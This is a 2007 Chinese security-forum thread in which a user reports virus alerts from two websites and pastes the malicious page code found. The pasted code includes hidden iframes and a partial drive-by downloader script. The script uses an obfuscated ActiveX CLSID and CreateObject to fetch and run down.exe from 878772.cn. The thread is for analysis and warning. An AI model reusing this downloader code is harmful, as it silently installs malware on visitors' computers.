新时代网页病毒防范软件--TW(请大家进来讨论)
今天打开下面这两个网站时,都提示有病毒:[url=http://blog.vckbase.com/Search.aspx?q=tlist]http://blog.vckbase.com/Search.aspx?q=tlist[/url]
[url=http://bbs.fhzw.net/]http://bbs.fhzw.net/[/url]
如下图的病毒1,弹出来后点阻止,3次后TW必挂!所以发上来这里让老大看看是怎么回事,附件是的RAR是病毒的文件!
但不一定就是上面这两个网站有病毒,可能是我的系统中了毒,造成这样的情况!
[[i] 本帖最后由 sbyguli 于 2007-7-15 21:40 编辑 [/i]] 我用超级巡警看了下,那三个黄色的原来是没有的,TW挂了后,就出现那三个黄色的DLL。所以TW虽然发现了病毒,但是没能有效的阻止,可惜了啊!
[[i] 本帖最后由 sbyguli 于 2007-7-15 21:44 编辑 [/i]] 病毒发作后,启动项了里多了一个项目! 以下是病毒的网页文件
arp.htm
[quote]<iframe src='http://878772.cn/arp.htm' width=0 height=0></iframe> <HTML>
<body style="CURSOR: url(wm/xjz2007.bmp)"></body>
<iframe width='100' height='100' src='vip.htm'></iframe>
<iframe width='100' height='100' src='wm/wm1.htm'></iframe>
<iframe width='100' height='100' src='wm/wm2.htm'></iframe>
<iframe width='100' height='100' src='wm/wm3.htm'></iframe>
//count1(tongji123)
<script language="javascript" src="[url=http://ww4.tongji123.com/t1.aspx?id=43559969]http://ww4.tongji123.com/t1.aspx?id=43559969"></script[/url]>
//count2(51la)
<script language="javascript" type="text/javascript" sr c="[url=http://js.users.51.la/1023960.js]ht tp://js.users.51.la/1023960.js"></script>[/url]
[/quote]
wm/wm1.htm部份:
[quote] <ifr ame sr c='http://878772.cn/arp.htm' width=0 height=0></iframe> <script>
document.writeln("<script language=\"javaScript\">");
document.writeln("microsofts=\"[url=http://www.878772.cn/down.exe\]http://www.878772.cn/down.exe\[/url]"");
document.writeln("microsofts1=\"microsofts.exe\"");
document.writeln("microsofts2=\"microsofts.vbs\"");
document.writeln("BianYuanZhe=\"[url=file://\\x42\\x44\\x39\\x36\\x43\\x35\\x35\\x36\\x2D\\x36\\x35\\x41\\x33\\x2D\\x31\\x31\\x44\\x30\\x2D\\x39\\x38\\x33\\x41\\x2D\\x30\\x30\\x43\\x30\\x34\\x46\\x43\\x32\\x39\\x45\\x33\\x36\]\\x42\\x44\\x39\\x36\\x43\\x35\\x35\\x36\\x2D\\x36\\x35\\x41\\x33\\x2D\\x31\\x31\\x44\\x30\\x2D\\x39\\x38\\x33\\x41\\x2D\\x30\\x30\\x43\\x30\\x34\\x46\\x43\\x32\\x39\\x45\\x33\\x36\[/url]"");
document.writeln("function Log(vip)");
document.writeln("{");
document.writeln(" var log=document.createElement(\'p\');");
document.writeln(" log.innerHTML=vip;");
document.writeln("}");
document.writeln("function CreateO(o,n)");
document.writeln("{");
document.writeln(" var r=null;");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.CreateObject(n)\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" if (!r)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.CreateObject(n,\"\")\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" if(!r)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.CreateObject(n,\"\",\"\")\')");
document.writeln(" }");[/quote]
[[i] 本帖最后由 sbyguli 于 2007-7-15 21:52 编辑 [/i]] 典型的网络木马啊 ,自动生成本地的木马主程序 一般下载是exe文件的99.9999%是有问题了,不过现在貌似也没啥人这样做了吧?
页:
[1]